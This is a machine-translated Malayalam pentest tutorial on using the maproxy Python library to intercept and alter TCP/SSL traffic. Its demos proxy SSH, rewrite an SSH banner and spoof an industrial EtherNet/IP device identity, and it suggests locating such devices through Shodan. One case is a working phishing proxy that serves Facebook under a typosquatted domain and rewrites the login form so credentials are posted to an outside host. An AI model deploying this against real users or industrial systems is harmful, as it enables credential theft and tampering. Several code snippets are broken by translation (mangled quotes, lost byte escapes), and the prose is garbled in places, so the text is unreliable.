ഫ്ലൈയിൽ നെറ്റ്‌വർക്ക് ഡാറ്റ പ്രോസസ്സ് ചെയ്യുക

കോഴ്‌സ് തുടങ്ങുന്നതിന്റെ തലേന്ന് തയ്യാറാക്കിയതാണ് ലേഖനത്തിന്റെ പരിഭാഷ “പെന്റസ്റ്റ്. നുഴഞ്ഞുകയറ്റ പരിശോധന പ്രാക്ടീസ്".

വ്യാഖ്യാനം

റെഗുലർ പെനെട്രേഷൻ ടെസ്റ്റിംഗും റെഡ് ടീം പ്രവർത്തനങ്ങളും മുതൽ IoT/ICS ഉപകരണങ്ങളും SCADA ഹാക്കിംഗ് വരെയുള്ള വിവിധ തരത്തിലുള്ള സുരക്ഷാ വിലയിരുത്തലുകളിൽ ബൈനറി നെറ്റ്‌വർക്ക് പ്രോട്ടോക്കോളുകളുമായി പ്രവർത്തിക്കുന്നത് ഉൾപ്പെടുന്നു, അതായത്, ക്ലയൻ്റിനും ടാർഗെറ്റിനുമിടയിലുള്ള നെറ്റ്‌വർക്ക് ഡാറ്റയെ തടസ്സപ്പെടുത്തുകയും പരിഷ്‌ക്കരിക്കുകയും ചെയ്യുന്നു. Wireshark, Tcpdump അല്ലെങ്കിൽ Scapy പോലുള്ള ടൂളുകൾ ഉള്ളതിനാൽ നെറ്റ്‌വർക്ക് ട്രാഫിക് സ്‌നിഫ് ചെയ്യുന്നത് ബുദ്ധിമുട്ടുള്ള കാര്യമല്ല, പക്ഷേ നെറ്റ്‌വർക്ക് ഡാറ്റ വായിക്കാനും ഫിൽട്ടർ ചെയ്യാനും മാറ്റാനും ഞങ്ങൾക്ക് ഏതെങ്കിലും തരത്തിലുള്ള ഇൻ്റർഫേസ് ആവശ്യമായതിനാൽ പരിഷ്‌ക്കരണം കൂടുതൽ അധ്വാനമുള്ള ജോലിയാണെന്ന് തോന്നുന്നു. അത് പറന്നുയരുകയും ഏകദേശം തത്സമയം ടാർഗെറ്റ് ഹോസ്റ്റിലേക്ക് തിരികെ അയയ്ക്കുകയും ചെയ്യുക. കൂടാതെ, അത്തരം ഒരു ഉപകരണം ഒന്നിലധികം സമാന്തര കണക്ഷനുകളിൽ സ്വയമേവ പ്രവർത്തിക്കുകയും സ്ക്രിപ്റ്റുകൾ ഉപയോഗിച്ച് ഇഷ്ടാനുസൃതമാക്കുകയും ചെയ്താൽ അത് അനുയോജ്യമാണ്.

ഒരു ദിവസം ഞാൻ ഒരു ഉപകരണം കണ്ടെത്തി maproxy, ഡോക്യുമെൻ്റേഷൻ പെട്ടെന്ന് എനിക്ക് അത് വ്യക്തമാക്കി maproxy - എനിക്ക് വേണ്ടത് മാത്രം. ഇത് വളരെ ലളിതവും വൈവിധ്യമാർന്നതും എളുപ്പത്തിൽ ക്രമീകരിക്കാവുന്നതുമായ TCP പ്രോക്സിയാണ്. നിരവധി സമാന്തര കണക്ഷനുകൾ കൈകാര്യം ചെയ്യാൻ കഴിയുമോ എന്നറിയാൻ ICS ഉപകരണങ്ങൾ ഉൾപ്പെടെ (ധാരാളം പാക്കറ്റുകൾ സൃഷ്ടിക്കുന്ന) സാമാന്യം സങ്കീർണ്ണമായ നിരവധി ആപ്ലിക്കേഷനുകളിൽ ഞാൻ ഈ ടൂൾ പരീക്ഷിച്ചു, ടൂൾ നന്നായി പ്രവർത്തിക്കുന്നു.

ഫ്ലൈ ഉപയോഗിച്ച് നെറ്റ്‌വർക്ക് ഡാറ്റ പ്രോസസ്സ് ചെയ്യുന്നതിനെക്കുറിച്ച് ഈ ലേഖനം നിങ്ങളെ പരിചയപ്പെടുത്തും maproxy.

പൊതു അവലോകനം

ഉപകരണം maproxy പൈത്തണിലെ ജനപ്രിയവും മുതിർന്നതുമായ അസിൻക്രണസ് നെറ്റ്‌വർക്കിംഗ് ചട്ടക്കൂടായ ടൊർണാഡോയെ അടിസ്ഥാനമാക്കിയുള്ളതാണ്.

പൊതുവേ, ഇതിന് നിരവധി മോഡുകളിൽ പ്രവർത്തിക്കാൻ കഴിയും:

• TCP:TCP - എൻക്രിപ്റ്റ് ചെയ്യാത്ത TCP കണക്ഷനുകൾ;
• TCP:SSL и SSL:TCP - വൺ-വേ എൻക്രിപ്ഷൻ ഉപയോഗിച്ച്;
• SSL:SSL - ടു-വേ എൻക്രിപ്ഷൻ.

ഇത് ഒരു ലൈബ്രറി ആയിട്ടാണ് വരുന്നത്. പെട്ടെന്നുള്ള തുടക്കത്തിനായി, പ്രധാനം പ്രതിഫലിപ്പിക്കുന്ന ഉദാഹരണ ഫയലുകൾ നിങ്ങൾക്ക് ഉപയോഗിക്കാം ലൈബ്രറി പ്രവർത്തനങ്ങൾ:

• all.py
• certificate.pem
• logging_proxy.py
• privatekey.pem
• ssl2ssl.py
• ssl2tcp.py
• tcp2ssl.py
• tcp2tcp.py

കേസ് 1 - ലളിതമായ ദ്വിദിശ പ്രോക്സി

അടിസ്ഥാനപെടുത്തി tcp2tcp.py:

#!/usr/bin/env python

import tornado.ioloop
import maproxy.proxyserver

server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()

സ്ഥിരമായി ProxyServer() രണ്ട് ആർഗ്യുമെൻ്റുകൾ എടുക്കുന്നു - കണക്ഷൻ ലൊക്കേഷനും ടാർഗെറ്റ് പോർട്ടും. server.listen() ഒരു വാദം എടുക്കുന്നു - ഇൻകമിംഗ് കണക്ഷൻ കേൾക്കുന്നതിനുള്ള പോർട്ട്.

സ്ക്രിപ്റ്റ് നടപ്പിലാക്കുന്നു:

# python tcp2tcp.py

ടെസ്റ്റ് പ്രവർത്തിപ്പിക്കുന്നതിന്, ഞങ്ങളുടെ പ്രോക്സി സ്ക്രിപ്റ്റ് വഴി ഞങ്ങൾ ഒരു പ്രാദേശിക SSH സെർവറിലേക്ക് കണക്റ്റുചെയ്യാൻ പോകുന്നു, അത് ശ്രദ്ധിക്കുന്നു 2222/tcp പോർട്ട് ഒരു സാധാരണ പോർട്ടിലേക്ക് ബന്ധിപ്പിക്കുന്നു 22/tcp SSH സെർവറുകൾ:

ഞങ്ങളുടെ ഉദാഹരണ സ്‌ക്രിപ്റ്റ് നെറ്റ്‌വർക്ക് ട്രാഫിക്ക് വിജയകരമായി പ്രോക്‌സി ചെയ്‌തതായി സ്വാഗത ബാനർ നിങ്ങളെ അറിയിക്കുന്നു.

കേസ് 2 - ഡാറ്റ പരിഷ്ക്കരണം

മറ്റൊരു ഡെമോ സ്ക്രിപ്റ്റ് logging_proxy.py നെറ്റ്‌വർക്ക് ഡാറ്റയുമായി സംവദിക്കാൻ അനുയോജ്യം. നിങ്ങളുടെ ലക്ഷ്യം നേടുന്നതിന് നിങ്ങൾക്ക് പരിഷ്‌ക്കരിക്കാവുന്ന ക്ലാസ് രീതികളെ ഫയലിലെ അഭിപ്രായങ്ങൾ വിവരിക്കുന്നു:

ഏറ്റവും രസകരമായ കാര്യം ഇവിടെയുണ്ട്:

• on_c2p_done_read - ക്ലയൻ്റിൽ നിന്ന് സെർവറിലേക്കുള്ള വഴിയിൽ ഡാറ്റ തടസ്സപ്പെടുത്തുന്നതിന്;
• on_p2s_done_read - വിപരീതമായി.

സെർവർ ക്ലയൻ്റിലേക്ക് മടങ്ങുന്ന SSH ബാനർ മാറ്റാൻ ശ്രമിക്കാം:

[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]

സ്ക്രിപ്റ്റ് എക്സിക്യൂട്ട് ചെയ്യുക:

നിങ്ങൾക്ക് കാണാനാകുന്നതുപോലെ, ക്ലയൻ്റിൻ്റെ SSH സെർവർ നാമം മാറ്റിയതിനാൽ ക്ലയൻ്റ് തെറ്റിദ്ധരിക്കപ്പെട്ടു «DumnySSH».

കേസ് 3 - ലളിതമായ ഫിഷിംഗ് വെബ് പേജ്

ഈ ഉപകരണം ഉപയോഗിക്കുന്നതിന് അനന്തമായ വഴികളുണ്ട്. ഇത്തവണ റെഡ് ടീം പ്രവർത്തനങ്ങളുടെ ഭാഗത്ത് നിന്ന് കൂടുതൽ പ്രായോഗികമായ ഒന്നിലേക്ക് ശ്രദ്ധ കേന്ദ്രീകരിക്കാം. നമുക്ക് ലാൻഡിംഗ് പേജ് അനുകരിക്കാം m.facebook.com കൂടാതെ മനഃപൂർവമായ അക്ഷരത്തെറ്റുള്ള ഒരു ഇഷ്‌ടാനുസൃത ഡൊമെയ്ൻ ഉപയോഗിക്കുക, ഉദാഹരണത്തിന്, m.facebok.com. ഡെമോൺസ്‌ട്രേഷൻ ആവശ്യങ്ങൾക്കായി, ഡൊമെയ്ൻ ഞങ്ങൾ രജിസ്റ്റർ ചെയ്തതാണെന്ന് കരുതുക.

ഞങ്ങളുടെ ഇരകളുടെ പ്രോക്സി, എസ്എസ്എൽ സ്ട്രീം എന്നിവയുമായി ഫേസ്ബുക്ക് സെർവറിലേക്ക് എൻക്രിപ്റ്റ് ചെയ്യാത്ത നെറ്റ്‌വർക്ക് കണക്ഷൻ ഞങ്ങൾ സ്ഥാപിക്കാൻ പോകുന്നു (31.13.81.36). ഈ ഉദാഹരണം പ്രവർത്തനക്ഷമമാക്കുന്നതിന്, ഞങ്ങൾക്ക് HTTP ഹോസ്റ്റ് ഹെഡർ മാറ്റി ശരിയായ ഹോസ്റ്റ്നാമം നൽകേണ്ടതുണ്ട്, കൂടാതെ പ്രതികരണ കംപ്രഷൻ ഞങ്ങൾ പ്രവർത്തനരഹിതമാക്കുകയും ചെയ്യും, അതിനാൽ ഞങ്ങൾക്ക് ഉള്ളടക്കങ്ങൾ എളുപ്പത്തിൽ ആക്സസ് ചെയ്യാൻ കഴിയും. ആത്യന്തികമായി ഞങ്ങൾ HTML ഫോം മാറ്റിസ്ഥാപിക്കും, അതുവഴി Facebook-ൻ്റെ സെർവറുകൾക്ക് പകരം ലോഗിൻ ക്രെഡൻഷ്യലുകൾ ഞങ്ങൾക്ക് അയയ്‌ക്കും:

[…]
def on_c2p_done_read(self,data):
 # replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response
     data = data.replace("action="/ml/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]

ചുരുക്കത്തിൽ:

നിങ്ങൾക്ക് കാണാനാകുന്നതുപോലെ, യഥാർത്ഥ സൈറ്റ് മാറ്റിസ്ഥാപിക്കാൻ ഞങ്ങൾക്ക് കഴിഞ്ഞു.

കേസ് 4 - പോർട്ടിംഗ് ഇഥർനെറ്റ്/IP

പ്രോഗ്രാമബിൾ കൺട്രോളറുകൾ (PLC), I/O മൊഡ്യൂളുകൾ, ഡ്രൈവുകൾ, റിലേകൾ, ലാഡർ പ്രോഗ്രാമിംഗ് പരിതസ്ഥിതികൾ തുടങ്ങി നിരവധി വ്യാവസായിക ഉപകരണങ്ങളും സോഫ്റ്റ്‌വെയറുകളും (ICS/SCADA) ഞാൻ കുറച്ചു കാലമായി കൈകാര്യം ചെയ്യുന്നു. വ്യാവസായിക കാര്യങ്ങൾ ഇഷ്ടപ്പെടുന്നവർക്കുള്ളതാണ് ഈ കേസ്. അത്തരം പരിഹാരങ്ങൾ ഹാക്ക് ചെയ്യുന്നത് നെറ്റ്‌വർക്ക് പ്രോട്ടോക്കോളുകൾ ഉപയോഗിച്ച് സജീവമായി കളിക്കുന്നത് ഉൾപ്പെടുന്നു. ഇനിപ്പറയുന്ന ഉദാഹരണത്തിൽ, നിങ്ങൾക്ക് ICS/SCADA നെറ്റ്‌വർക്ക് ട്രാഫിക്ക് എങ്ങനെ പരിഷ്‌ക്കരിക്കാമെന്ന് കാണിക്കാൻ ഞാൻ ആഗ്രഹിക്കുന്നു.

ഇതിനായി നിങ്ങൾക്ക് ഇനിപ്പറയുന്നവ ആവശ്യമാണ്:

• നെറ്റ്‌വർക്ക് സ്നിഫർ, ഉദാഹരണത്തിന്, വയർഷാർക്ക്;
• ഇഥർനെറ്റ്/IP അല്ലെങ്കിൽ ഒരു SIP ഉപകരണം, നിങ്ങൾക്ക് ഷോഡാൻ സേവനം ഉപയോഗിച്ച് അത് കണ്ടെത്താനാകും;
• ഞങ്ങളുടെ സ്ക്രിപ്റ്റ് അടിസ്ഥാനമാക്കിയുള്ളതാണ് maproxy.

ആദ്യം, CIP (കോമൺ ഇൻഡസ്ട്രിയൽ പ്രോട്ടോക്കോൾ) ൽ നിന്നുള്ള ഒരു സാധാരണ തിരിച്ചറിയൽ പ്രതികരണം എങ്ങനെയുണ്ടെന്ന് നോക്കാം:

ഇഥർനെറ്റ്/ഐപി പ്രോട്ടോക്കോൾ ഉപയോഗിച്ചാണ് ഡിവൈസ് ഐഡൻ്റിഫിക്കേഷൻ നടത്തുന്നത്, സിഐപി പോലുള്ള കൺട്രോൾ പ്രോട്ടോക്കോളുകൾ പൊതിയുന്ന വ്യാവസായിക ഇഥർനെറ്റ് പ്രോട്ടോക്കോളിൻ്റെ മെച്ചപ്പെടുത്തിയ പതിപ്പാണ് ഇത്. സ്‌ക്രീൻഷോട്ടിൽ ദൃശ്യമാകുന്ന ഹൈലൈറ്റ് ചെയ്‌ത ഐഡി നാമം ഞങ്ങൾ മാറ്റാൻ പോകുന്നു "ഇഥർനെറ്റിനായുള്ള NI-IndComm" ഞങ്ങളുടെ പ്രോക്സി സ്ക്രിപ്റ്റ് ഉപയോഗിച്ച്. നമുക്ക് സ്ക്രിപ്റ്റ് വീണ്ടും ഉപയോഗിക്കാം logging_proxy.py കൂടാതെ ക്ലാസ് രീതിയും സമാനമായി പരിഷ്കരിക്കുക on_p2s_done_read, കാരണം ക്ലയൻ്റിൽ മറ്റൊരു ഐഡൻ്റിറ്റി നാമം ദൃശ്യമാകാൻ ഞങ്ങൾ ആഗ്രഹിക്കുന്നു.

കോഡ്:

[…]
 def on_p2s_done_read(self,data):
 # partial replacement of response

 # Checking if we got List Identity message response
     if data[26:28] == b'x0cx00':
         print('Got response, replacing')
         data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
     super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]

അടിസ്ഥാനപരമായി, ഞങ്ങൾ രണ്ട് തവണ ഉപകരണ ഐഡൻ്റിഫിക്കേഷൻ ആവശ്യപ്പെട്ടു, രണ്ടാമത്തെ പ്രതികരണം ഒറിജിനൽ ആയിരുന്നു, ആദ്യത്തേത് ഈച്ചയിൽ പരിഷ്ക്കരിച്ചു.

അവസാനത്തേതും

എന്റെ അഭിപ്രായത്തിൽ maproxy സൗകര്യപ്രദവും ലളിതവുമായ ഒരു ഉപകരണം, അത് പൈത്തണിലും എഴുതിയിരിക്കുന്നു, അതിനാൽ നിങ്ങൾക്കും ഇത് ഉപയോഗിക്കുന്നതിലൂടെ പ്രയോജനം ലഭിക്കുമെന്ന് ഞാൻ വിശ്വസിക്കുന്നു. തീർച്ചയായും, നെറ്റ്‌വർക്ക് ഡാറ്റ പ്രോസസ്സ് ചെയ്യുന്നതിനും പരിഷ്‌ക്കരിക്കുന്നതിനുമായി കൂടുതൽ സങ്കീർണ്ണമായ ടൂളുകൾ ഉണ്ട്, എന്നാൽ അവയ്ക്ക് കൂടുതൽ ശ്രദ്ധ ആവശ്യമുണ്ട് കൂടാതെ സാധാരണയായി ഒരു പ്രത്യേക ഉപയോഗത്തിനായി സൃഷ്ടിക്കപ്പെട്ടവയാണ്, ഉദാ. മുറേന, മോഡ്ലിഷ്ക അഥവാ ദുഷിച്ച മൂന്നാമത്തേതിന് സമാനമായ കേസുകൾക്ക്, അല്ലെങ്കിൽ കാനപ്പ് അവസാന കേസിനായി. ഒരു വഴി അല്ലെങ്കിൽ മറ്റൊന്ന്, സഹായത്തോടെ maproxy ഉദാഹരണ സ്ക്രിപ്റ്റുകൾ വളരെ വ്യക്തമായതിനാൽ, നെറ്റ്‌വർക്ക് ഡാറ്റ തടസ്സപ്പെടുത്തുന്നതിനുള്ള നിങ്ങളുടെ ആശയങ്ങൾ നിങ്ങൾക്ക് വേഗത്തിൽ നടപ്പിലാക്കാൻ കഴിയും.

വിൻഡോസ് എഡിയിൽ പ്രാമാണീകരണ സംവിധാനങ്ങൾ പരിശോധിക്കുന്നു

അവലംബം: www.habr.com